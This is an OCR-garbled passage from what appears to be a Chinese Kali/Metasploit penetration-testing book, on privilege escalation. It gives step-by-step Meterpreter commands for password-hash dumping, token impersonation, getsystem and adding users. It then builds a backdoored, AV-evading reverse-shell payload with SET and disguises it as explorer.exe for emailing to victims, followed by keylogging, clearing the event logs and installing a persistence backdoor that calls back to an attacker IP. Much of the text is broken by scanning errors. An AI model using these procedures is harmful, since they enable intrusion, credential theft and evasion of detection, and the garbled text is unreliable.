[^] Calculating the hboot key using SYSKEY 88f6c818af614f7033cb885 
[^] Obtaining the user list and keys.. 

[*] Decrypting user keys... 

[^] Dumping password hints... 

Test: "www.123" 

abc: “123456” 

alice: “passwd” 

[^] Dumping password hashes... 

Administrator :500:aad3b435b51404eeaad3b435b51404ee: 31d6cfe0d16ae93: 
Guest :501:aad3b435b51404eeaad3b435b51404ee: 31d6cfe0d16ae931b73c59d ， 
bob:1001:aad3b435b51404eeaad3b435b51404ee: 32ed87bdb5fdc5e9cba88547: 


4] — 


从 输出 的 信息 中 ， 可 以 看 到 目标 系统 中 有 三 个 用 户 ， 并 且 可 以 看 到 它们 的 UID 及 窗 
码 哈 希 值 。 而 且 ， 还 捕获 到 三 个 键盘 输入 的 密码 。 如 捕获 的 Test 用 户 ， 其 密码 为 
www. 123. 





第 7 革 ”权限 提升 


权限 提升 束 是 料 某 个 用 户 原来 拥有 的 最 低 权 限 所 高 到 最 高 。 通 剃 ， 我 们 获得 访问 的 
用 户 可 能 拥有 最 低 的 权限 。 但 是 ， 如 果 要 进行 渗透 攻击 ， 可 能 需要 管理 员 账 号 的 权 
限 ， 所 以 融 需 要 来 提升 权限 。 权 限 提 升 可 以 通过 使 用 假冒 人 牌 、 本 地 权限 提升 和 储 
会 工程 学 等 方法 实现 。 本 草料 介绍 提升 用 户 权 限 的 各 种 方法 。 


本 半 主 要 知识 点 如 下 : 


e FARES The ; 

e 本 地 权限 提升 攻击 ; 

e 使 用 社会 工程 学 工具 包 (SET) 
e 使 用 SET 实施 攻击 。 


7.1 使 用 假冒 分 牌 


使 用 假 土 令 牌 可 以 假冒 一 个 网 络 中 的 另 一 个 用 户 进 行 各 种 操作 ， 如 提升 用 户 权 限 、 
创建 用 户 和 组 等 。 兮 牌 包括 登录 会 话 的 安全 信息 ， 如 用 户 身 份 识别 、 用 户 组 和 用 户 
权限 。 当 一 个 用 户 登 录 Windows 系 统 时 ， 它 被 给 定 一 个 访问 分 脾 作为 它 认 证 会 话 的 
一 部 分 。 例 如 ， 一 个 人 侵 用 户 可 能 需要 以 域 管 理 员 义理 一 个 特定 任务 ， 当 它 使 用 兮 
牌 便 可 假冒 域 管 理 员 进行 工作 。 当 它 处 理 完 任务 时 ， 通 常会 丢弃 该 铭牌 权限 。 这 
样 ， 人 侵 者 将 利用 这 个 弱点 ， 来 提升 它 的 访问 权限 。 本 节 将 介绍 在 Meterpreter 
Shell 下 实现 假冒 令 牌 攻击 。 


7.1.1 工作 机 制 


在 假冒 令 牌 攻击 中 需要 使 用 了 Kerberos 协 议 。 所 以 在 使 用 假冒 分 牌 前 ， 先 介绍 下 
Kerberos 协 议 。Kerberos 是 一 种 网 络 认证 协议 ， 其 设计 目标 是 通过 密 钥 系统 为 客户 
机 /服务 器 应 用 程序 提供 强大 的 认证 服务 。Kerberos 工 作 机 制 如 图 7.1 所 示 。 











ss 


认证 服务 器 AS = 
图 7.1 Kerberos TEHLE! 

客户 端 请 求证 书 的 过 程 如 下 所 示 : 

(1) 9 Pm iEBRA SS (AS) 发 送 请 求 ， 要 求 得 到 服务 器 的 证 书 。 

(2) AS 收 到 请 求 后 ， 将 包含 客户 端 密 钥 的 加 密 证 书 响 应 发 送 给 客户 痛 。 该 证 书包 
括 服 务 器 ticket ( 乌 括 服务 器 密 钥 加 密 的 客户 机 身份 和 一 份 会话 密 钥 ) 和 一 个 临时 加 


RRA (又 称 为 会 话 密 钥 Session key) 。 当 然 ， 认 证 服务 器 会 料 该 证 书 给 服务 器 也 
发 大 一 份 ， 用 来 使 服务 器 认证 登录 客户 痕 身 份 。 


(3) 客户 病 将 ticket 传 送 到 服务 器 上 ， 服 务 器 确认 该 客户 问 的 话 ， 便 人 允许 它 登 录 服 
务 器 。 


—_ 


(4) RHE omak, DURER LA ARIS ARR RRE E PT 
牌 。 


7.1.2 FAHRE he 


为 了 获取 一 个 Meterpreter Shell， 用 户 必须 使 用 Metasploit 去 攻击 一 台 主 机 后 才 可 成 
功 建立 Meterpreter 会 话 。 对 于 使 用 Metasploit 攻 击 主机 的 方法 ， 在 第 6 章 有 详细 介 
绍 ， 这 里 融 不 再 资 述 。 使 用 分 牌 假 填 的 具体 操作 步骤 如 下 所 示 。 


(1) 和 启动 Meterpreter 会 话 。 执 行 命 仿 如 下 所 示 : 


msf auxiliary(browser autopwn) > sessions -i 1 
[*] Starting interaction with 1.. 
meterpreter » 


从 输出 的 信息 可 以 看 到 ， 成 功 启 动 了 Meterpreter 会 话 。 


(2) 使 用 use incognito 命 令 加 载 incognito 模 块 ， 然 后 列举 出 邻 牌 。 执 行 命 伟 如 下 
AAS : 


meterpreter > use incognito 
Loading extension incognito..success. 


输出 的 信息 表示 成 功 加 载 incognito 模 块 。 然 后 可 以 通过 查看 帮助 信息 ， 了 解 列 举 兮 
牌 的 命 分 。 执 行 命令 如 下 所 示 : 


meterpreter > help 
Core Commands 


Command 


? 
background 
bgkill 

bglist 

bgrun 


channel 
close 


disable unicode encoding 
enable unicode encoding 


exit 
help 
info 
interact 


Description 

Help menu 

Backgrounds the current session 

Kills a background meterpreter script 
Lists running background scripts 
Executes a meterpreter script as a 
background thread 

Displays information about active channels 
Closes a channel 

Disables encoding of unicode strings 
Enables encoding of unicode strings 
Terminate the meterpreter session 

Help menu 

Displays information about a Post module 
Interacts with a channel 

Drop into irb scripting mode 


Stdapi Mes Darm Comma nds 


Command 
record mic 
webcam list 
webcam snap 
Priv: Elevate Commands 


"Description 

Record audio from the default microphone for X seconds 
List webcams 

Take a snapshot from the specified webcam 


EE Er mcum uem nem uer uem uer uum uer ee etc umm ee ee 


Command 


getsystem 


Attempt to elevate your privilege to that of local system. 


Priv: Password database Commands 


hash dump 


Bene the contents of the SAM database 


Priv: Timestomp Commands 


ee e e E 


Command 
timestomp 
Incognito Commands 


eee ee ee EF EE ee ee ee 


Command 
add_group_user 

add localgroup user 
add user 
impersonate token 
list tokens 

snarf hashes 


parapi 


Manipulate file MACE attributes 


Description 

Attempt to add a user to a global group with all tokens 
Attempt to add a user to a local group with all tokens 
Attempt to add a user with all tokens 

Impersonate specified token 

List tokens available under current user context 

Snarf challenge/response hashes for every token 


以 上 输出 信息 显示 incognito 模 块 下 的 所 有 命令。 从 输出 的 信息 中 可 以 看 到 列举 当前 


有 效 的 邻 牌 命令 是 list tokens。 执 行 以 上 命令 后 将 输出 大 量 信 息 ， 由 于 篇 幅 原 因 ， 
部 分 内 容 使 用 省 略 号 C...) 取代 了 。 
(3) 列举 所 有 兮 牌 。 执 行 命 令 如 下 所 示 : 


meterpreter > list_tokens -u 

[-] Warning: Not currently running as SYSTEM, not all tokens will | 
Call rev2self if primary process token is SYSTEM 

Delegation Tokens Available 


AA-8860KJM26FSWNTest 
Impersonation Tokens Available 


No tokens available 


4 9kg5» —  —  - 





从 输出 的 信息 可 以 看 到 分 配 的 有 效 使 有 牌 有 AA-886OKJM26FSW\Test。 其 中 AA- 
886OKJM26FSW 表 示 目 标 条 统 的 主机 名 ，Test 表 示 登 录 的 用 户 名 。 


(4) 使 用 impersonate token 命 命 假冒 Test 用 户 进行 攻击 。 执 行 命 舍 如 下 所 示 : 


meterpreter > impersonate token AA-8860KJM26FSWNNTest 

[-] Warning: Not currently running as SYSTEM, not all tokens will | 
Call rev2self if primary process token is SYSTEM 

[+] Delegation token available 

[+] Successfully impersonated user AA-8860KJM26FSWNTest 


mi 


从 输出 的 信息 中 可 以 看 到 假冒 Test 用 户 成 功 。 此 时 就 可 以 通过 提升 自己 的 权限 ， 在 
目标 系统 中 进行 任何 操作 了 。 
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7.2 本 地 权限 提升 


上 一 节 介 绍 了 完 取 目标 系统 令 牌 ， 现 在 来 介绍 完 取 兮 牌 后 如 何 提升 在 目标 系统 上 的 
权限 。 提升 本 地 权限 可 以 使 用 户 访问 目标 系统， 并 且 进 行 其 他 的 操作 如 创建 用 户 
和 组 等 。 本 节 将 介绍 本 地 权限 提升 。 


同样 的 实现 本 地 权限 提升 ， 也 需要 连接 到 Meterpreter 会 话 ， 具 体操 作 就 不 再 介绍 。 
本 地 权限 提升 的 具体 操作 步骤 如 下 所 示 。 


(1) 启动 Meterpreter 会 话 。 执 行 命令 如 下 所 示 : 


msf auxiliary(browser_autopwn) > sessions -i 1 
[*] Starting interaction with 1.. 
meterpreter > 


从 输出 的 信息 可 以 看 到 ， 成 功 和 启动 了 Meterpreter 会 话 。 


(2) 使 用 getsystem 命 分 提 升 本 地 权限 。 首 和 拖 ， 查 看 该 命令 的 帮助 信息 。 执 行 命 
如 下 所 示 : 


meterpreter > getsystem -h 
Usage: getsystem [options] 
Attempt to elevate your privilege to that of local system. 
OPTIONS: 
-h Help Banner. 
-t «opt» Iis technique to use. (Default to '0'). 
0 : All techniques available 
1 : Service - Named Pipe Impersonation (In Memory/Admin 
2 : Service - Named Pipe Impersonation (Dropper/Admin) 
3 : Service - Token Duplication (In Memory/Admin) 


3] :4 
输出 的 信息 显示 了 getsystem 命 命 的 语法 格式 、 作 用 及 选项 等 。 此 时 就 可 以 根据 自 
己 的 需要 ， 使 用 相应 的 选项 来 提升 本 地 权限 。 

(3) 使 用 getsystem 命 令 提 升 本 地 权限 。 执 行 命令 如 下 所 示 : 

meterpreter > getsystem 


„got system (via technique 1). 
meterpreter » 


从 输出 的 信息 可 以 看 到 ， 自 动 选 择 了 方法 1。 此 时 该 用 户 就 拥有 了 目标 系统 中 Test 用 
户 的 权限 了 ， 然 后 束 可 以 做 其 他 的 操作 ， 如 创建 文件 、 创 建 用 户 和 组 等 。 如 使 用 该 
用 户 在 目标 系统 上 192.168.41.146 创 建 一 个 名 为 bob 的 用 户 。 执 行 合 爷 如 下 所 示 : 


meterpreter > add_user bob 123456 -h 192.168.41.146 


执行 以 上 命 倒 后 ， 可 以 在 主机 192.168.41.146 上 查看 到 创建 的 bob 用 户 。 


7.3 使 用 社会 工程 学 工具 包 (SET) 


社会 工程 学 工具 包 (SET) 是 一 个 开源 的 、Python 驱 动 的 社会 工程 学 渗透 测试 工 
具 。 这 套 工 具 包 由 David Kenned 设 计 ， 而 且 已 经 成 为 业界 部 署 实 施 社 会 工程 学 攻击 
的 标准 。SET 利 用 人 们 的 好 奇 心 、 信 任 、 贪 交 及 一 些 恩 春 的 错误 ， 攻 击 人 们 目 身 存 
在 的 弱点 。 使 用 SET 可 以 传递 攻击 载 傈 到 目标 系统 ， 收 集 目 标 系 统 数据 ， 创 建 持久 
后 门 ， 进 行 中 间 人 攻击 等 。 本 节 将 介绍 社会 工程 学 工具 包 的 使 用 。 


7.3.1 启动 仕 会 工程 学 工具 乌 
使 用 社会 工程 学 工具 包 之 前 ， 需 要 和 启动 该 工具 。 具 体操 作 步 又 如 下 所 示 。 
(1) 启动 SET。 在 终 痛 执行 如 下 所 示 的 命 人 : 
root@kali:~# setoolkit 
或 者 在 桌面 上 依次 选择 “应 用 程序 ”|Kali Linux "漏洞 利用 工具 集 "|Social Engineering 
Toolkit|[setoolkitis 45, HAHHAA X zsetoolkitás 4; 22 17 B^ 2 Um. 


HiT AL aaa, Tama PAPAS : 


[-] New set config.py file generated on: 2014-05-06 18:05:41.76612: 
[-] Verifying configuration update.. 
[^] Update verified, config timestamp is: 2014-05-06 18:05:41.7661 
[^] SET is using the new config, no need to restart 
Copyright 2013, The Social-Engineer Toolkit (SET) by TrustedSec, LI 
All rights reserved. 
Redistribution and use in source and binary forms, with or without 
* Redistributions of source code must retain the above copyright 
* Redistributions in binary form must reproduce the above copyrit 
in the documentation and/or other materials provided with the d: 
* Neither the name of Social-Engineer Toolkit nor the names of il 
this software without specific prior written permission. 
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTOR: 
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS I 
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENT/ 
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF U: 
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TOR 
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
The above licensing was taken from the BSD licensing and is appliec 
Note that the Social-Engineer Toolkit is provided as is, and is a} 
Feel free to modify, use, change, market, do whatever you want witli 
is due (which means giving the authors the credit they deserve for 
see the creator of SET in a bar, you should give him a hug and buy 
holds the right to refuse the hug or the beer. 
The Social-Engineer Toolkit is designed purely for good and not ev: 
not authorized by the company you are performing assessments for, \ 
yes (only one time), you agree to the terms of service and that yot 
Do you agree to the terms of service [y/n]: 


输出 的 信息 详细 的 介绍 了 SET。 该 信息 在 第 一 次 运行 时 ， 才 会 显示 。 人 在 该 界面 接受 


` 





这 部 分 信息 后 ， 才 可 进行 其 他 操作 。 此 时 输入 y， 将 显示 如 下 所 示 的 信息 : 


— The Social-Engineer Toolkit (SET) [---] 


[---] Created by: David Kennedy (ReL1K) [---] 


2] Version: 5.4.2 [一 | 
a Codename: ‘Walkers’ [一 


iI Follow us on Twitter: @TrustedSec [---] 
一) Follow me on Twitter: @HackingDave [---] 
[一 | Homepage: https:/www.trustedsec.com [---] 


Welcome to the Social-Engineer Toolkit (SET). 
The one stop shop for all of your SE needs. 
Join us on irc.freenode.net in channel #setoolkit 
The Social-Engineer Toolkit is a product of TrustedSec. 
Visit: https://www.trustedsec.com 
Select from the menu: "SET 菜单 
1) Social-Engineering Attacks 
2) Fast-Track Penetration Testing 
3) Third Party Modules 
4) Update the Metasploit Framework 
5) Update the Social-Engineer Toolkit 
6) Update SET configuration 
7) Help, Credits, and About 
99) Exit the Social-Engineer Toolkit 


set- 


以 上 显示 了 社会 工程 学 工具 乌 的 创建 者 、 版 本 、 代 号 及 菜单 信息 。 此 时 可 以 根据 目 
己 的 需要 ， 选 择 相 应 的 编写 进行 操作 。 


(2) 这 里 选择 攻击 社会 工程 学 ， 在 菜单 中 的 编号 为 1， 所 以 在 set> 后 面 输入 1， 将 
显示 如 下 所 示 的 信息 : 


Set> 工 
Welcome to the Social-Engineer Toolkit (SET). 
The one stop shop for all of your SE needs. 
Join us on irc.freenode.net in channel #setoolkit 
The Social-Engineer Toolkit is a product of TrustedSec. 
Visit: https://www.trustedsec.com 
Select from the menu: 
1) Spear-Phishing Attack Vectors 
2) Website Attack Vectors 
3) Infectious Media Generator 
4) Create a Payload and Listener 
5) Mass Mailer Attack 
6) Arduino-Based Attack Vector 
7) SMS Spoofing Attack Vector 
8) Wireless Access Point Attack Vector 
9) QRCode Generator Attack Vector 
10) Powershell Attack Vectors 
11) Third Party Modules 
99) Return back to the main menu. 


以 上 信息 显示 了 攻击 社会 工程 学 的 荣 单 选项 ， 这 时 融 可 以 选择 攻击 工程 学 的 类 型 ， 
然后 进行 攻击 。 


(3) 这 里 选择 创建 一 个 攻击 载 坷 和 监听 器 ， 输 入 编号 4， 如 下 所 示 : 


set> 4 


set:payloads> Enter the IP address for the payload (reverse):192.168.41.146 


What payload do you want to generate: 
Name: 
1) Windows Shell Reverse_TCP 
2) Windows Reverse_TCP Meterpreter 
3) Windows Reverse_TCP VNC DLL 
4) Windows Bind Shell 
5) Windows Bind Shell X64 
6) Windows Shell Reverse TCP X64 
7) Windows Meterpreter Reverse TCP X64 
8) Windows Meterpreter All Ports 
9) Windows Meterpreter Reverse HTTPS 
10) Windows Meterpreter Reverse DNS 
11) SE Toolkit Interactive Shell 
12) SE Toolkit HTTP Reverse Shell 
13) RATTE HTTP Tunneling Payload 
14) ShellCodeExec Alphanum Shellcode 
15) Pylnjector Shellcode Injection 
16) MultiPyinjector Shellcode Injection 


17) Import your own executable 


# 设 置 攻击 者 的 IP 地 址 


Description: 


Spawn a command shell on victim 
and send back to attacker 

Spawn a meterpreter shell on 
victim and send back to attacker 
Spawn a VNC server on victim and 
send back to attacker 

Execute payload and create an 
accepting port on remote system 
Windows x64 Command Shell, Bind 
TCP Inline 

Windows A64 Command Shell, 
Reverse TCP Inline 

Connect back to the attacker 
(Windows x64), Meterpreter 
Spawn a meterpreter shell and 
find a port home (every port) 
Tunnel communication over HTTP 
using SSL and use Meterpreter 
Use a hostname instead of an IP 
address and spawn Meterpreter 
Custom interactive reverse 

toolkit designed for SET 

Purely native HTTP shell with 
AES encryption support 

Security bypass payload that 

will tunnel all comms over HTTP 
This will drop a meterpreter 
payload through shellcodeexec 
This will drop a meterpreter 
payload through Pylnjector 

This will drop multiple 

Metasploit payloads via memory 
Specify a path for your own 
executable 


输出 的 信息 显示 了 可 生成 的 所 有 攻击 载 何 ， 此 时 根据 自己 的 目标 系统 选择 相应 的 攻 


击 载 何 。 


(4) 本 例 中 攻击 的 目标 系统 为 Windows XP 32 位 ， 所 以 这 里 选择 编写 2。 如 下 所 


/小 - 


set:payloads> 2 
Select one of the below, 


‘backdoored executable' is typically the | 


most still get picked up by AV. You may need to do additional pack: 
in order to get around basic AV detection. 


1) shikata ga nai 

2) No Encoding 

3) Multi-Encoder 

4) Backdoored Executable 


al — : 


输出 的 信息 显 





示 了 获取 基于 AV 攻 击 的 几 种 方法 。 


(5) 这 里 选择 第 4 种 ， 输 入 编号 4， 如 下 所 示 : 


set:encoding»4 

set:payloads> PORT of the listener [443]: # 设 置 监 听 的 端口 号 

[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds... 

[+] Backdoor completed successfully. Payload is now hidden within a legit executable. 
[+] Your payload is now in the root directory of SET as payload.exe 

[-] The payload can be found in the SET home directory. 


set» Start the listener now? [yes|no]: yes # 现 在 启用 监听 的 端口 号 
[-] Please wait while the Metasploit listener is loaded... 

[-] oe oe 

[-] * WARNING: Database support has been disabled 

[-] *** 

# cowsay** 


= metasploit > 


SS Er 


save your shells from AV! Upgrade to advanced AV evasion using dynamic 

exe templates with Metasploit Pro -- type 'go pro to launch it now. 
=| metasploit v4.8.2-2014010101 [core:4.8 api: 1.0] 

* -- --z[ 1246 exploits - 678 auxiliary - 198 post 

+ -- --=[ 324 payloads - 32 encoders - 8 nops 

[*] Processing /root/.set/meta config for ERB directives. 

resource (/root/.set/meta config)» use exploit/multi/handler 

resource (/root/.set/meta config)» set PAYLOAD windows/meterpreter/ 

reverse tcp 

PAYLOAD => windows/meterpreter/reverse tcp 

resource (/root/.set/meta config)» set LHOST 192.168.41.234 

LHOST => 192.168.41.234 

resource (/root/.set/meta config)» set LPORT 443 

LPORT => 443 

resource (/root/.set/meta config)» set EnableStageEncoding false 

EnableStageEncoding => false 

resource (/root/.set/meta config)» set ExitOnSession false 

ExitOnSession => false 

resource (/root/.set/meta config)» exploit -j 

[*] Exploit running as background job. 

msf exploit(handler) > 

[*] Started reverse handler on 192.168.41.234:443 

[*] Starting the payload handler... 


da HH Bf i. ETTI RERLERF — Tie, (Eg EERURHBIEBJIPIBLUE Sm 
sf f Bp, JEHUIJE T — handler, ix ERPS mO ÍTARE, Aye 
X WLLERBIBESETEZ TAF, BEMO ETH. SURG) GEUTASIRS DU ENNS 
FROEN d BIS AUEG ERR, HA iE EN t Ro 


7.3.2 传递 攻击 载 何 给 目标 系统 


Wei (Payload) 指 的 是 用 户 期 望 目标 系统 在 被 渗透 攻击 之 后 执行 的 代码 。 在 
Metasploit 框 染 中 可 以 自由 地 选择 、 传 送 和 植 入 。 例 如 ， 反 弹 式 Shell 是 一 种 从 目标 
主机 到 攻击 主机 创建 网 络 连接 ， 并 提供 命令 行 ShelI 的 攻击 载 何 ， 而 Bind Shell 攻 击 
载荷 则 在 目标 系统 上 将 命令 行 Shell 绑 定 到 一 个 打开 的 监听 端口 ， 攻 击 者 可 以 连接 这 
些 疹 口 来 取得 Shell 交 互 。 攻 击 载 傈 也 可 能 是 简单 的 在 目标 系统 上 执行 一 些 命 伟 ， 如 
添加 用 户 账 号 等 。 下 面 将 介绍 创建 攻击 载 傈 给 目标 系统 的 方法 。 


传递 攻击 载 傈 给 目标 系统 。 上 有 具体 操作 步骤 如 下 所 示 。 


(1) 社会 工程 学 工具 默认 安装 在 /usrshare/set 下 ， 在 该 目录 中 有 一 个 EXE 文 件 ， 
名 为 payload.exe。 在 渗透 测试 时 为 了 避免 被 目标 主机 用 户 发 现 ， 建 议 修改 该 文件 
名 ， 然 后 再 发 送 给 其 他 人 。 发 送 给 其 他 人 的 方法 很 多 ， 如 邮件 和 存储 在 优盘 等 。 首 
先 切 换 到 /usrshare/set 目 录 中 ， 查 看 该 目录 下 的 文件 。 执 行 命令 如 下 所 示 : 


root@kali:~# cd /usr/share/set/ 

root(@kali:/usr/share/set# Is 

~ modules readme seaulomate setoolkit seupdate src 
config payload.exe README.txt seproxy setup.py seweb 


从 以 上 内 容 中 可 以 看 到 有 一 个 名 为 payload.exe 的 文件 。 接 下 来 可 以 修改 该 文件 的 名 
为 explorer.exe， 然 后 发 送 给 其 他 人 。 


(2) 修改 payload.exe 文 件 名 。 执 行 命 分 如 下 所 示 : 


root@kali:/usr/share/set# mv payload.exe explorer.exe 

root@kali:/usr/share/set# Is 

= explorer.exe readme seautomate setoolkit seupdate src 
config modules README.txt seproxy setup.py seweb 


从 以 上 内 容 可 以 看 到 ， 目 前 只 有 一 个 名 为 explorer.exe 文 件 。 


(3) 将 该 文件 传递 给 其 他 人 。 如 果 使 用 邮件 的 形 陈 传递 ， 需 要 将 该 文件 进行 压 
缩 。 因 为 邮件 不 支持 发 送 EXE 文 件 。 可 以 使 用 ZIP 命 令 压 缩 该 文件 ， 如 下 所 示 : 


root@kali:/usr/share/set# zip healthfiles explorer.exe 
adding: explorer.exe (deflated 88%) 


MAAANBS ALAS, explorer.exeX fF px: gs. beat, RA Lit SRUERSTÉ 
式 发 送 给 其 他 人 。 当 该 内 容 被 目标 系统 中 的 用 户 打 开 后 ， 将 会 与 攻击 者 建立 一 个 活 
跃 的 会 话 。 如 下 所 示 : 


msf exploit(handler) > 
[*] Sending stage (769024 bytes) to 192.168.41.146 
[*] Meterpreter session 1 opened (192.168.41.234:443 -> 192.168.41 


al = 


看 到 以 上 内 容 ， 表 示 目 标 系 统 和 与 攻击 者 成 功 建立 了 会 话 。 现 在 ， 攻 击 者 束 可 以 在 目 
标 系 统 上 做 目 己 想 要 做 的 事 。 


7.3.3 收集 目标 系统 数据 


在 前 面 介 绍 了 将 攻击 载 倚 传 递 给 目标 系统 ， 并 成 功 建立 会 话 。 当 成 功 建立 会 话 后 ， 
攻击 者 可 以 从 目标 系统 中 收集 其 数据 。 收 集 目标 系统 的 数据 ， 使 用 户 尽 可 能 使 用 这 
些 信息 做 进一步 渗透 攻击 。 下 面料 介绍 收集 目标 系统 的 数据 。 收 集 目标 系统 数据 的 
具体 操作 步骤 如 下 所 示 。 


(1) 激活 Meterpreter 会 话 。 执 行 命 爷 如 下 所 示 : 





msf exploit(handler) > sessions -i 1 
[*] Starting interaction with 11... 


(2) FERAL. dU D mA RANT: 


meterpreter » keyscan start 
Starting the keystroke sniffer.. 


(3) 收集 目标 系统 中 的 数据 。 执 行 命 分 如 下 所 示 : 


meterpreter > keyscan_dump 
Dumping captured keystrokes... 
<Return> <Return> <Return> <N1> <Return> 2 <Return> 34 


从 输出 的 信息 可 以 看 到 ， 目 标 系 统 执 行 过 回 车 键 、 输 入 了 数字 1、2 和 34 等 。 


7.3.4 清除 路 还 


当 攻 击 者 入 侵 目 标 系 统 后 ， 做 的 任何 操作 都 可 能 会 被 记录 到 目标 系统 的 日 志文 件 
中 。 为 了 不 外 目 标 系 统 所 发 现 ， 清 除 路 迹 是 非常 重要 的 工作 。 因 为 如 果 被 发 现 ， 可 
能 带 来 很 大 的 麻烦 。 REA TRAD PS 因为 Metasploit 提 供 了 一 种 方 
法 可 以 很 容易 的 来 清除 所 有 踪迹 。 下 面 将 介绍 使 用 Metasploit 清 除 踪 迹 的 方法 。 使 
用 Metasploit 清 除 踊 迹 的 具体 操 作 步 骤 如 下 所 示 。 


(1) 激活 Meterpreter 会 话 。 执 行 命令 如 下 所 示 : 


msf exploit(handler) > sessions -i 1 
[*] Starting interaction with 1.. 


(2) 在 Metasploit 中 的 irb 命 令 可 以 清除 踪迹 。 执 行 命令 如 下 所 示 : 


meterpreter > irb 

[*] Starting IRB shell 

[^] The 'client' variable holds the meterpreter client 
22 


输出 的 信息 中 看 到 >> 提 示 符 ， 表 示 成 功 运行 了 irb 命 分 。 
(3) 设置 想 要 删除 的 日 志 。 音 用 的 日 志 选 项 如 下 所 示 : 


e log = client.sys.eventlog.open('system") ; 
e log = client.sys.eventlog.open(' security) ; 
e log = client.sys.eventlog.open(‘application’) ; 


e log = client.sys.eventlog.open(' directory service’) ; 
e log = client.sys.eventlog.open('dns server) ; 
e log = client.sys.eventlog.open(‘file replication service"), 


这 里 清除 所 有 日 志 。 执行 命令 如 下 所 示 : 


>> log = client.sys.eventlog.open( System ) 

>> log = client.sys.eventlog.open( 'security' ) 

>> log = client.sys.eventlog.open( 'application' ) 

>> log = client.sys.eventlog.open( 'directory service’ ) 

>> log = client.sys.eventlog.open('dns server' ) 

>> log = client.sys.eventlog.open('file replication service' ) 


执行 以 上 命令 后 ， 表 示 指 定 了 要 清除 的 日 志 。 接 下 来 需要 执行 log.clear 命 令 才 可 以 
清除 日 志文 件 。 执 行 命 分 如 下 所 示 : 


>> log.clear 


执行 以 上 命 分 后 ， 将 会 隐藏 用 户 的 路 迹 。 


7.3.5 创建 持久 后 门 


当成 功 获取 目标 系统 的 访问 权限 后 ， 需 要 寻找 方法 来 恢复 与 目标 主机 的 连接 ， 而 无 
需 册 进入 目标 系统 。 如 果 目 标 用 户 破 坏 了 该 连接 ， 例 如 重新 启动 计算 机 ， 此 时 使 用 
后 门 料 允许 目 动 重新 与 目标 系统 建立 连接 。 为 了 后 所 以 需要 创建 一 个 
后 门 。 这 样 ， 即 使 连接 修 中 断 ， 也 不 会 影响 工作 。 下 面料 介绍 创建 持久 后 门 。 创 建 
持久 后 门 的 具体 操作 步骤 如 下 所 示 。 


(1) 激活 Meterpreter 会 话 。 执 行 命令 如 下 所 示 : 


msf exploit(handler) > sessions -i 1 
[*] Starting interaction with 1.. 
meterpreter » 


(2) 创建 持久 后 门 之 前 ， 先 查看 下 它 的 帮助 文件 。 执 行 命 分 如 下 所 示 : 


meterpreter > run persistence -h 

Meterpreter Script for creating a persistent backdoor on a target host. 

OPTIONS: 
=A, Automatically start a matching multi/handler to connect to the agent 
-L «opt» Location in target host where to write payload to, if none %TEMP will be used. 
-P «opt» Payload to use, default is windows/meterpreter/reverse tcp. 


-5 Automatically start the agent on boot as a service (with SYSTEM privileges) 
-| «opt» Alternate executable template to use 

-U Automatically start the agent when the User logs on 

-X Automatically start the agent when the system boots 

-h This help menu 


-| «opt» The interval in seconds between each connection attempt 
-p «opt» The port on the remote host where Metasploit is listening 
-f «opt» The IP of the system running Metasploit listening for the connect back 


以 上 信息 显示 了 持久 后 门 的 一 些 选项 。 使 用 不 同 的 选项 ， 来 设置 后 门 。 
(3) 创建 一 个 持久 后 门 。 执 行 命 分 如 下 所 示 : 


meterpreter > run persistence -U -A -i 10 - 8090 -r 192.168.41.234 
[*] Running Persistance Script 

[^] Resource file for cleanup created at /root/.msf4/logs/persister 
AA-8860KJM26FSW 20140507.2857/AA-8860KJM26FSW 20140507.2857.rc 

[^] Creating Payload-windows/meterpreter/reverse tcp LHOST=192.168 
[^] Persistent agent script is 148405 bytes long 

[+] Persistent Script written to C:\DOCUME~1\Test\LOCALS~1\Temp\Iz) 
[*] Starting connection handler at port 4444 for windows/meterprete 
[+] Multi/Handler started! 

[^] Executing script C:\DOCUME~1\Test\LOCALS~1\Temp\IZXBdJvcpnD. vb: 
[+] Agent executed with PID 1612 

[^] Installing into autorun as HKCU\Software\Microsoft\Windows\ 
CurrentVersionNRunNmERugsIe 

[+] Installed into autorun as HKCU\Software\Microsoft\Windows \ 
CurrentVersionNRunNmERugsIe 


a] = | 2 


D 的 一 个 过 程 。 在 以 上 信息 中 可 以 看 到 ， 在 目标 系统 中 创 
一 个 持久 脚本 ， 保 存在 
SR 1\Test\LOCALS~1\Temp\lzXBdJvcpnD.vbs。 并 且 ， 该 脚本 会 自动 在 
目标 主机 上 运行 ， 此 时 将 会 建立 第 二 个 Meterpreter 会 话 。 如 下 所 示 : 





meterpreter > [*] Meterpreter session 2 opened (192.168.41.234:443 
a] _ SSS ee eee a ere ree a ere re ra re rea rere aie 
看 到 以 上 的 输出 信息 ， 表 示 该 持久 后 门 已 创建 成 功 。 





7.3.6 中 间 人 攻击 (MITM) 


中 间 人 攻击 (Man in the Middle Attack, 简称 "MITM 攻 击 ”) 是 一 种 间接 的 入 侵 攻 
击 。 这 种 攻击 模式 是 通过 各 种 扩 术 手段 ， 将 受 人 侵 者 控制 的 一 台 计 算 机 虚拟 放置 在 
网 络 连 手中 的 两 台 通 信 计 算 机 之 间 ， 这 人 台 计 算 机 融 称 为 "中 间 人 ”。 下 面 将 介绍 使 用 


Ettercap 工 具 实 现 中 间 人 攻击 。 
1. 存在 的 漏洞 


表面 介绍 了 中 间 人 攻击 是 通过 使 用 各 种 技术 手段 对 目标 主机 进行 攻击 的 。 主 机 既然 
做 攻击 ， 则 说 明 在 传输 效 据 的 过 程 中 存在 有 漏洞 。 搂 下 来 融 分 析 一 下 所 存在 的 漏 
7A] 


当主 机 之 间 进 行 通 信 时 ， 通 过 封装 数据 已 进而 转发 到 目标 主机 上 。 转 发 的 数据 包 中 
包括 源 IP 地 址 、 目 标 IP 地 址 及 MAC 地 址 。 但 是 当主 机 在 自己 的 缓存 表 中 找 不 到 目标 
主机 的 地 址 时 ， 它 会 发 送 ARP 广 播 ， 在 此 过 程 中 就 可 能 被 其 他 攻击 者 冒充 目标 主 
机 。 


2. ARP 其 骗 原 理 


